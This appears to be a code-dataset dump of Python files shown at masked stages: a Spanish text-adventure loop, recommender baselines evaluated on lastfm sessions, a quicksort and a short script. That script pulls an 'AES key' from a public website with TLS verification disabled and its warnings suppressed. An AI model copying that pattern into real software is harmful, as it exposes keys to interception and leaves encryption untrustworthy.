False\r\n\r\n while puntuacion < puntuacion_necesaria and derrota == False:\r\n dado = Funciones.roll_dice(100)\r\n if dado <= 20:\r\n lugar_actual = bosque\r\n elif dado <= 35:\r\n lugar_actual = ciudad\r\n elif dado <= 65:\r\n lugar_actual = montana\r\n elif dado <= 95:\r\n lugar_actual = lago\r\n else:\r\n lugar_actual = viajero\r\n\r\n print(lugar_actual.descripcion)\r\n print(\"a)\", lugar_actual.evento_1.nombre, \"b)\", lugar_actual.evento_2.nombre)\r\n decision = \"\"\r\n\r\n while decision != \"a\" and decision != \"b\":\r\n decision = input()\r\n\r\n if decision != \"a\" and decision != \"b\":\r\n print(\"Esa opción no existe.\")\r\n\r\n if decision == \"a\":\r\n evento_actual = lugar_actual.evento_1\r\n else:\r\n evento_actual = lugar_actual.evento_2\r\n\r\n print(evento_actual.descripcion)\r\n\r\n (hp, puntuacion, derrota) = Funciones.interactuar(evento_actual, puntuacion, hp, derrota)\r\n print(\"\\n\")\r\n\r\n Funciones.comprobar_victoria(derrota, puntuacion)\r\n\r\n quiere_jugar = input(\"\\n¿Reintentar? \").lower()\r\n print(\"\\n\")\r\n if quiere_jugar != \"si\" and \"yes\" and \"y\" and \"s\":\r\n puede_jugar = False", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import collections import datetime import os import pickle import random import time from lastfm_utils import PlainRNNDataHandler from test_util import Tester reddit = "subreddit" lastfm = "lastfm" instacart = "instacart" # # Choose dataset here # dataset = lastfm # # Specify the correct path to the dataset # dataset_path = os.path.expanduser('~') + '/datasets/'+dataset+'/4_train_test_split.pickle' date_now = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d') log_file = './testlog/'+str(date_now)+'-testing' # Does not really matter. Only needs to be here because of my earler short sightedness. Used by test_util BATCHSIZE = 2 datahandler = PlainRNNDataHandler(dataset_path, BATCHSIZE, log_file) num_train_batches = datahandler.get_num_training_batches() num_test_batches = datahandler.get_num_test_batches() num_items = datahandler.get_num_items() # # MAX_SESSION_LENGTH -1. Change this if you change the length in preprocessing # num_predictions = 19 # Log dataset and baseline model def log_config(baseline): message = "------------------------------------------------------------------------" message += "\nDATASET: "+dataset message += "\nBASELINE: "+baseline datahandler.log_config(message) print(message) # Create sequence of predictions for one session, with the 'most recent' baseline def most_recent_sequence_predicions(sequence, sequence_length): full_prediction_sequence = random.sample(range(1, num_items), num_predictions) predictions = [] for i in range(sequence_length): current_item = sequence[i] if current_item in full_prediction_sequence: index = full_prediction_sequence.index(current_item) del(full_prediction_sequence[index]) full_prediction_sequence.insert(0, current_item) predictions.append(full_prediction_sequence[:num_predictions]) return predictions # The 'most recent' baseline. A stack where the most recent item in the session is pushed on top. def most_recent(): log_config("most_recent") datahandler.reset_user_batch_data() tester = Tester() x, y, sl = datahandler.get_next_test_batch() while len(x) > int(BATCHSIZE/2): prediction_batch = [] for i in range(len(x)): prediction_batch.append(most_recent_sequence_predicions(x[i], sl[i])) tester.evaluate_batch(prediction_batch, y, sl) x, y, sl = datahandler.get_next_test_batch() test_stats, _1, _2 = tester.get_stats_and_reset() print(test_stats) datahandler.log_test_stats(0, 0, test_stats) # The 'most popular' baseline. Count frequence of all items, and predict the top k (20) most frequent items def most_popular(): log_config("most_popular") datahandler.reset_user_batch_data() popularity_count = [0]*(num_items+1) tester = Tester() # Training x, y, sl = datahandler.get_next_train_batch() while len(x) > int(BATCHSIZE/2): for i in range(len(x)): sequence_length = sl[i]+1 items = x[i][:sequence_length] for item in items: popularity_count[item] += 1 x, y, sl = datahandler.get_next_train_batch() top_k = sorted(range(len(popularity_count)), key=lambda i:popularity_count[i]) top_k = top_k[-num_predictions:] top_k = list(reversed(top_k)) # Testing datahandler.reset_user_batch_data() x, y, sl = datahandler.get_next_test_batch() while len(x) > int(BATCHSIZE/2): prediction_batch = [] for i in range(len(x)): sequence_predictions = [] for j in range(sl[i]): sequence_predictions.append(top_k) prediction_batch.append(sequence_predictions) tester.evaluate_batch(prediction_batch, y, sl) x, y, sl = datahandler.get_next_test_batch() test_stats, _1, _2 = tester.get_stats_and_reset() print(test_stats) datahandler.log_test_stats(0, 0, test_stats) # Item-kNN baseline. Count cooccurences of items. Predict items with highest cooccurences with the current item def knn(): global num_train_batches log_config("kNN") datahandler.reset_user_batch_data() cooccurrances = [] for i in range(num_items): cooccurrances.append({}) # Training x, y, sl = datahandler.get_next_train_batch() while len(x) > int(BATCHSIZE/2): print("train", num_train_batches) num_train_batches -= 1 for b in range(len(x)): sequence_length = sl[b]+1 items = x[b][:sequence_length] # For each item in the session, increment cooccurences with the remaining items in the session for i in range(len(items)-1): for j in range(i+1, len(items)): if items[j] not in cooccurrances[items[i]]: cooccurrances[items[i]][items[j]] = 0 cooccurrances[items[i]][items[j]] += 1 x, y, sl = datahandler.get_next_train_batch() # Find the highest cooccurences preds = [None]*num_items for i in range(num_items): d = cooccurrances[i] d = list(d.items()) d = sorted(d, key=lambda x:x[1]) d = [x[0] for x in d[-num_predictions:]] preds[i] = list(reversed(d)) del(cooccurrances) #Testing tester = Tester() datahandler.reset_user_batch_data() x, y, sl = datahandler.get_next_test_batch() while len(x) > int(BATCHSIZE/2): prediction_batch = [] for b in range(len(x)): sequence_predictions = [] for i in range(sl[b]): current_item = x[b][i] sequence_predictions.append(preds[current_item]) prediction_batch.append(sequence_predictions) tester.evaluate_batch(prediction_batch, y, sl) x, y, sl = datahandler.get_next_test_batch() test_stats, _1, _2 = tester.get_stats_and_reset() print(test_stats) datahandler.log_test_stats(0, 0, test_stats) most_recent() most_popular() knn()
normal
{ "blob_id": "9e8ddf6c35ebad329e1f5a48513e4bfaae0d9a6f", "index": 4925, "step-1": "<mask token>\n\n\ndef log_config(baseline):\n message = (\n '------------------------------------------------------------------------'\n )\n message += '\\nDATASET: ' + dataset\n message += '\\nBASELINE: ' + baseline\n datahandler.log_config(message)\n print(message)\n\n\n<mask token>\n\n\ndef most_recent():\n log_config('most_recent')\n datahandler.reset_user_batch_data()\n tester = Tester()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for i in range(len(x)):\n prediction_batch.append(most_recent_sequence_predicions(x[i],\n sl[i]))\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\ndef most_popular():\n log_config('most_popular')\n datahandler.reset_user_batch_data()\n popularity_count = [0] * (num_items + 1)\n tester = Tester()\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE / 2):\n for i in range(len(x)):\n sequence_length = sl[i] + 1\n items = x[i][:sequence_length]\n for item in items:\n popularity_count[item] += 1\n x, y, sl = datahandler.get_next_train_batch()\n top_k = sorted(range(len(popularity_count)), key=lambda i:\n popularity_count[i])\n top_k = top_k[-num_predictions:]\n top_k = list(reversed(top_k))\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for i in range(len(x)):\n sequence_predictions = []\n for j in range(sl[i]):\n sequence_predictions.append(top_k)\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\ndef knn():\n global num_train_batches\n log_config('kNN')\n datahandler.reset_user_batch_data()\n cooccurrances = []\n for i in range(num_items):\n cooccurrances.append({})\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE / 2):\n print('train', num_train_batches)\n num_train_batches -= 1\n for b in range(len(x)):\n sequence_length = sl[b] + 1\n items = x[b][:sequence_length]\n for i in range(len(items) - 1):\n for j in range(i + 1, len(items)):\n if items[j] not in cooccurrances[items[i]]:\n cooccurrances[items[i]][items[j]] = 0\n cooccurrances[items[i]][items[j]] += 1\n x, y, sl = datahandler.get_next_train_batch()\n preds = [None] * num_items\n for i in range(num_items):\n d = cooccurrances[i]\n d = list(d.items())\n d = sorted(d, key=lambda x: x[1])\n d = [x[0] for x in d[-num_predictions:]]\n preds[i] = list(reversed(d))\n del cooccurrances\n tester = Tester()\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for b in range(len(x)):\n sequence_predictions = []\n for i in range(sl[b]):\n current_item = x[b][i]\n sequence_predictions.append(preds[current_item])\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef log_config(baseline):\n message = (\n '------------------------------------------------------------------------'\n )\n message += '\\nDATASET: ' + dataset\n message += '\\nBASELINE: ' + baseline\n datahandler.log_config(message)\n print(message)\n\n\ndef most_recent_sequence_predicions(sequence, sequence_length):\n full_prediction_sequence = random.sample(range(1, num_items),\n num_predictions)\n predictions = []\n for i in range(sequence_length):\n current_item = sequence[i]\n if current_item in full_prediction_sequence:\n index = full_prediction_sequence.index(current_item)\n del full_prediction_sequence[index]\n full_prediction_sequence.insert(0, current_item)\n predictions.append(full_prediction_sequence[:num_predictions])\n return predictions\n\n\ndef most_recent():\n log_config('most_recent')\n datahandler.reset_user_batch_data()\n tester = Tester()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for i in range(len(x)):\n prediction_batch.append(most_recent_sequence_predicions(x[i],\n sl[i]))\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\ndef most_popular():\n log_config('most_popular')\n datahandler.reset_user_batch_data()\n popularity_count = [0] * (num_items + 1)\n tester = Tester()\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE / 2):\n for i in range(len(x)):\n sequence_length = sl[i] + 1\n items = x[i][:sequence_length]\n for item in items:\n popularity_count[item] += 1\n x, y, sl = datahandler.get_next_train_batch()\n top_k = sorted(range(len(popularity_count)), key=lambda i:\n popularity_count[i])\n top_k = top_k[-num_predictions:]\n top_k = list(reversed(top_k))\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for i in range(len(x)):\n sequence_predictions = []\n for j in range(sl[i]):\n sequence_predictions.append(top_k)\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\ndef knn():\n global num_train_batches\n log_config('kNN')\n datahandler.reset_user_batch_data()\n cooccurrances = []\n for i in range(num_items):\n cooccurrances.append({})\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE / 2):\n print('train', num_train_batches)\n num_train_batches -= 1\n for b in range(len(x)):\n sequence_length = sl[b] + 1\n items = x[b][:sequence_length]\n for i in range(len(items) - 1):\n for j in range(i + 1, len(items)):\n if items[j] not in cooccurrances[items[i]]:\n cooccurrances[items[i]][items[j]] = 0\n cooccurrances[items[i]][items[j]] += 1\n x, y, sl = datahandler.get_next_train_batch()\n preds = [None] * num_items\n for i in range(num_items):\n d = cooccurrances[i]\n d = list(d.items())\n d = sorted(d, key=lambda x: x[1])\n d = [x[0] for x in d[-num_predictions:]]\n preds[i] = list(reversed(d))\n del cooccurrances\n tester = Tester()\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for b in range(len(x)):\n sequence_predictions = []\n for i in range(sl[b]):\n current_item = x[b][i]\n sequence_predictions.append(preds[current_item])\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\nmost_recent()\nmost_popular()\nknn()\n", "step-3": "<mask token>\nreddit = 'subreddit'\nlastfm = 'lastfm'\ninstacart = 'instacart'\ndataset = lastfm\ndataset_path = os.path.expanduser('~'\n ) + '/datasets/' + dataset + '/4_train_test_split.pickle'\ndate_now = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d')\nlog_file = './testlog/' + str(date_now) + '-testing'\nBATCHSIZE = 2\ndatahandler = PlainRNNDataHandler(dataset_path, BATCHSIZE, log_file)\nnum_train_batches = datahandler.get_num_training_batches()\nnum_test_batches = datahandler.get_num_test_batches()\nnum_items = datahandler.get_num_items()\nnum_predictions = 19\n\n\ndef log_config(baseline):\n message = (\n '------------------------------------------------------------------------'\n )\n message += '\\nDATASET: ' + dataset\n message += '\\nBASELINE: ' + baseline\n datahandler.log_config(message)\n print(message)\n\n\ndef most_recent_sequence_predicions(sequence, sequence_length):\n full_prediction_sequence = random.sample(range(1, num_items),\n num_predictions)\n predictions = []\n for i in range(sequence_length):\n current_item = sequence[i]\n if current_item in full_prediction_sequence:\n index = full_prediction_sequence.index(current_item)\n del full_prediction_sequence[index]\n full_prediction_sequence.insert(0, current_item)\n predictions.append(full_prediction_sequence[:num_predictions])\n return predictions\n\n\ndef most_recent():\n log_config('most_recent')\n datahandler.reset_user_batch_data()\n tester = Tester()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for i in range(len(x)):\n prediction_batch.append(most_recent_sequence_predicions(x[i],\n sl[i]))\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\ndef most_popular():\n log_config('most_popular')\n datahandler.reset_user_batch_data()\n popularity_count = [0] * (num_items + 1)\n tester = Tester()\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE / 2):\n for i in range(len(x)):\n sequence_length = sl[i] + 1\n items = x[i][:sequence_length]\n for item in items:\n popularity_count[item] += 1\n x, y, sl = datahandler.get_next_train_batch()\n top_k = sorted(range(len(popularity_count)), key=lambda i:\n popularity_count[i])\n top_k = top_k[-num_predictions:]\n top_k = list(reversed(top_k))\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for i in range(len(x)):\n sequence_predictions = []\n for j in range(sl[i]):\n sequence_predictions.append(top_k)\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\ndef knn():\n global num_train_batches\n log_config('kNN')\n datahandler.reset_user_batch_data()\n cooccurrances = []\n for i in range(num_items):\n cooccurrances.append({})\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE / 2):\n print('train', num_train_batches)\n num_train_batches -= 1\n for b in range(len(x)):\n sequence_length = sl[b] + 1\n items = x[b][:sequence_length]\n for i in range(len(items) - 1):\n for j in range(i + 1, len(items)):\n if items[j] not in cooccurrances[items[i]]:\n cooccurrances[items[i]][items[j]] = 0\n cooccurrances[items[i]][items[j]] += 1\n x, y, sl = datahandler.get_next_train_batch()\n preds = [None] * num_items\n for i in range(num_items):\n d = cooccurrances[i]\n d = list(d.items())\n d = sorted(d, key=lambda x: x[1])\n d = [x[0] for x in d[-num_predictions:]]\n preds[i] = list(reversed(d))\n del cooccurrances\n tester = Tester()\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for b in range(len(x)):\n sequence_predictions = []\n for i in range(sl[b]):\n current_item = x[b][i]\n sequence_predictions.append(preds[current_item])\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\nmost_recent()\nmost_popular()\nknn()\n", "step-4": "import collections\nimport datetime\nimport os\nimport pickle\nimport random\nimport time\nfrom lastfm_utils import PlainRNNDataHandler\nfrom test_util import Tester\nreddit = 'subreddit'\nlastfm = 'lastfm'\ninstacart = 'instacart'\ndataset = lastfm\ndataset_path = os.path.expanduser('~'\n ) + '/datasets/' + dataset + '/4_train_test_split.pickle'\ndate_now = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d')\nlog_file = './testlog/' + str(date_now) + '-testing'\nBATCHSIZE = 2\ndatahandler = PlainRNNDataHandler(dataset_path, BATCHSIZE, log_file)\nnum_train_batches = datahandler.get_num_training_batches()\nnum_test_batches = datahandler.get_num_test_batches()\nnum_items = datahandler.get_num_items()\nnum_predictions = 19\n\n\ndef log_config(baseline):\n message = (\n '------------------------------------------------------------------------'\n )\n message += '\\nDATASET: ' + dataset\n message += '\\nBASELINE: ' + baseline\n datahandler.log_config(message)\n print(message)\n\n\ndef most_recent_sequence_predicions(sequence, sequence_length):\n full_prediction_sequence = random.sample(range(1, num_items),\n num_predictions)\n predictions = []\n for i in range(sequence_length):\n current_item = sequence[i]\n if current_item in full_prediction_sequence:\n index = full_prediction_sequence.index(current_item)\n del full_prediction_sequence[index]\n full_prediction_sequence.insert(0, current_item)\n predictions.append(full_prediction_sequence[:num_predictions])\n return predictions\n\n\ndef most_recent():\n log_config('most_recent')\n datahandler.reset_user_batch_data()\n tester = Tester()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for i in range(len(x)):\n prediction_batch.append(most_recent_sequence_predicions(x[i],\n sl[i]))\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\ndef most_popular():\n log_config('most_popular')\n datahandler.reset_user_batch_data()\n popularity_count = [0] * (num_items + 1)\n tester = Tester()\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE / 2):\n for i in range(len(x)):\n sequence_length = sl[i] + 1\n items = x[i][:sequence_length]\n for item in items:\n popularity_count[item] += 1\n x, y, sl = datahandler.get_next_train_batch()\n top_k = sorted(range(len(popularity_count)), key=lambda i:\n popularity_count[i])\n top_k = top_k[-num_predictions:]\n top_k = list(reversed(top_k))\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for i in range(len(x)):\n sequence_predictions = []\n for j in range(sl[i]):\n sequence_predictions.append(top_k)\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\ndef knn():\n global num_train_batches\n log_config('kNN')\n datahandler.reset_user_batch_data()\n cooccurrances = []\n for i in range(num_items):\n cooccurrances.append({})\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE / 2):\n print('train', num_train_batches)\n num_train_batches -= 1\n for b in range(len(x)):\n sequence_length = sl[b] + 1\n items = x[b][:sequence_length]\n for i in range(len(items) - 1):\n for j in range(i + 1, len(items)):\n if items[j] not in cooccurrances[items[i]]:\n cooccurrances[items[i]][items[j]] = 0\n cooccurrances[items[i]][items[j]] += 1\n x, y, sl = datahandler.get_next_train_batch()\n preds = [None] * num_items\n for i in range(num_items):\n d = cooccurrances[i]\n d = list(d.items())\n d = sorted(d, key=lambda x: x[1])\n d = [x[0] for x in d[-num_predictions:]]\n preds[i] = list(reversed(d))\n del cooccurrances\n tester = Tester()\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE / 2):\n prediction_batch = []\n for b in range(len(x)):\n sequence_predictions = []\n for i in range(sl[b]):\n current_item = x[b][i]\n sequence_predictions.append(preds[current_item])\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\nmost_recent()\nmost_popular()\nknn()\n", "step-5": "import collections\nimport datetime\nimport os\nimport pickle\nimport random\nimport time\nfrom lastfm_utils import PlainRNNDataHandler\nfrom test_util import Tester\n\nreddit = \"subreddit\"\nlastfm = \"lastfm\"\ninstacart = \"instacart\"\n\n#\n# Choose dataset here\n#\ndataset = lastfm\n\n#\n# Specify the correct path to the dataset\n#\ndataset_path = os.path.expanduser('~') + '/datasets/'+dataset+'/4_train_test_split.pickle'\n\ndate_now = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d')\nlog_file = './testlog/'+str(date_now)+'-testing'\n# Does not really matter. Only needs to be here because of my earler short sightedness. Used by test_util\nBATCHSIZE = 2\ndatahandler = PlainRNNDataHandler(dataset_path, BATCHSIZE, log_file)\nnum_train_batches = datahandler.get_num_training_batches()\nnum_test_batches = datahandler.get_num_test_batches()\nnum_items = datahandler.get_num_items()\n\n#\n# MAX_SESSION_LENGTH -1. Change this if you change the length in preprocessing\n#\nnum_predictions = 19\n\n# Log dataset and baseline model\ndef log_config(baseline):\n message = \"------------------------------------------------------------------------\"\n message += \"\\nDATASET: \"+dataset\n message += \"\\nBASELINE: \"+baseline\n datahandler.log_config(message)\n print(message)\n\n# Create sequence of predictions for one session, with the 'most recent' baseline\ndef most_recent_sequence_predicions(sequence, sequence_length):\n full_prediction_sequence = random.sample(range(1, num_items), num_predictions)\n predictions = []\n for i in range(sequence_length):\n current_item = sequence[i]\n if current_item in full_prediction_sequence:\n index = full_prediction_sequence.index(current_item)\n del(full_prediction_sequence[index])\n full_prediction_sequence.insert(0, current_item)\n predictions.append(full_prediction_sequence[:num_predictions])\n return predictions\n\n# The 'most recent' baseline. A stack where the most recent item in the session is pushed on top.\ndef most_recent():\n log_config(\"most_recent\")\n datahandler.reset_user_batch_data()\n tester = Tester()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE/2):\n prediction_batch = []\n\n for i in range(len(x)):\n prediction_batch.append(most_recent_sequence_predicions(x[i], sl[i]))\n\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n# The 'most popular' baseline. Count frequence of all items, and predict the top k (20) most frequent items\ndef most_popular():\n log_config(\"most_popular\")\n datahandler.reset_user_batch_data()\n popularity_count = [0]*(num_items+1)\n tester = Tester()\n\n # Training\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE/2):\n for i in range(len(x)):\n sequence_length = sl[i]+1\n items = x[i][:sequence_length]\n \n for item in items:\n popularity_count[item] += 1\n x, y, sl = datahandler.get_next_train_batch()\n \n top_k = sorted(range(len(popularity_count)), key=lambda i:popularity_count[i])\n top_k = top_k[-num_predictions:]\n top_k = list(reversed(top_k))\n\n # Testing\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE/2):\n prediction_batch = []\n\n for i in range(len(x)):\n sequence_predictions = []\n for j in range(sl[i]):\n sequence_predictions.append(top_k)\n prediction_batch.append(sequence_predictions)\n\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n \n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n# Item-kNN baseline. Count cooccurences of items. Predict items with highest cooccurences with the current item\ndef knn():\n global num_train_batches\n log_config(\"kNN\")\n datahandler.reset_user_batch_data()\n cooccurrances = []\n for i in range(num_items):\n cooccurrances.append({})\n\n # Training\n x, y, sl = datahandler.get_next_train_batch()\n while len(x) > int(BATCHSIZE/2):\n print(\"train\", num_train_batches)\n num_train_batches -= 1\n for b in range(len(x)):\n sequence_length = sl[b]+1\n items = x[b][:sequence_length]\n \n # For each item in the session, increment cooccurences with the remaining items in the session\n for i in range(len(items)-1):\n for j in range(i+1, len(items)):\n if items[j] not in cooccurrances[items[i]]:\n cooccurrances[items[i]][items[j]] = 0\n cooccurrances[items[i]][items[j]] += 1\n\n x, y, sl = datahandler.get_next_train_batch()\n \n # Find the highest cooccurences\n preds = [None]*num_items\n for i in range(num_items):\n d = cooccurrances[i]\n d = list(d.items())\n d = sorted(d, key=lambda x:x[1])\n d = [x[0] for x in d[-num_predictions:]]\n preds[i] = list(reversed(d))\n\n del(cooccurrances)\n\n #Testing\n tester = Tester()\n datahandler.reset_user_batch_data()\n x, y, sl = datahandler.get_next_test_batch()\n while len(x) > int(BATCHSIZE/2):\n prediction_batch = []\n\n for b in range(len(x)):\n sequence_predictions = []\n for i in range(sl[b]):\n current_item = x[b][i]\n sequence_predictions.append(preds[current_item])\n prediction_batch.append(sequence_predictions)\n tester.evaluate_batch(prediction_batch, y, sl)\n x, y, sl = datahandler.get_next_test_batch()\n\n test_stats, _1, _2 = tester.get_stats_and_reset()\n print(test_stats)\n datahandler.log_test_stats(0, 0, test_stats)\n\n\n\nmost_recent()\nmost_popular()\nknn()", "step-ids": [ 4, 6, 7, 8, 9 ] }
[ 4, 6, 7, 8, 9 ]
#!/usr/bin/python3 import requests import urllib3 urllib3.disable_warnings() response = requests.get('https://freeaeskey.xyz', verify=False) data = response.text.encode('utf-8') key = data[data.index(b'<b>')+3:data.index(b'</b>')] print(key.decode('ascii'))
normal
{ "blob_id": "368e209f83cc0cade81791c8357e01e7e3f940c8", "index": 97, "step-1": "<mask token>\n", "step-2": "<mask token>\nurllib3.disable_warnings()\n<mask token>\nprint(key.decode('ascii'))\n", "step-3": "<mask token>\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>') + 3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n", "step-4": "import requests\nimport urllib3\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>') + 3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n", "step-5": "#!/usr/bin/python3\n\nimport requests\nimport urllib3\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>')+3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from .alexnet import * from .lenet import * from .net import * from .vae import *
normal
{ "blob_id": "56d5915d30e85285da549cc69ef25714bacc6f3a", "index": 8304, "step-1": "<mask token>\n", "step-2": "from .alexnet import *\nfrom .lenet import *\nfrom .net import *\nfrom .vae import *\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
# python3 from random import randint def partition3(array, left, right): pivot = array[right] begin = left - 1 end = left - 1 for j in range(left, right): if array[j] < pivot: begin += 1 array[begin], array[j] = array[j], array[begin] end += 1 if array[j] == pivot: array[end], array[j] = array[j], array[end] elif array[j] == pivot: end += 1 array[end], array[j] = array[j], array[end] array[end + 1], array[right] = array[right], array[end + 1] return begin + 1, end + 1 def randomized_quick_sort(array, left, right): if left >= right: return k = randint(left, right) array[left], array[k] = array[k], array[left] small, equal = partition3(array, left, right) randomized_quick_sort(array, left, small - 1) randomized_quick_sort(array, equal + 1, right) if __name__ == '__main__': input_n = int(input()) elements = list(map(int, input().split())) assert len(elements) == input_n randomized_quick_sort(elements, 0, len(elements) - 1) print(*elements)
normal
{ "blob_id": "a2fc9d947c75eaaaeafcd92750c99f4cfcdb9d7d", "index": 4517, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef partition3(array, left, right):\n pivot = array[right]\n begin = left - 1\n end = left - 1\n for j in range(left, right):\n if array[j] < pivot:\n begin += 1\n array[begin], array[j] = array[j], array[begin]\n end += 1\n if array[j] == pivot:\n array[end], array[j] = array[j], array[end]\n elif array[j] == pivot:\n end += 1\n array[end], array[j] = array[j], array[end]\n array[end + 1], array[right] = array[right], array[end + 1]\n return begin + 1, end + 1\n\n\ndef randomized_quick_sort(array, left, right):\n if left >= right:\n return\n k = randint(left, right)\n array[left], array[k] = array[k], array[left]\n small, equal = partition3(array, left, right)\n randomized_quick_sort(array, left, small - 1)\n randomized_quick_sort(array, equal + 1, right)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef partition3(array, left, right):\n pivot = array[right]\n begin = left - 1\n end = left - 1\n for j in range(left, right):\n if array[j] < pivot:\n begin += 1\n array[begin], array[j] = array[j], array[begin]\n end += 1\n if array[j] == pivot:\n array[end], array[j] = array[j], array[end]\n 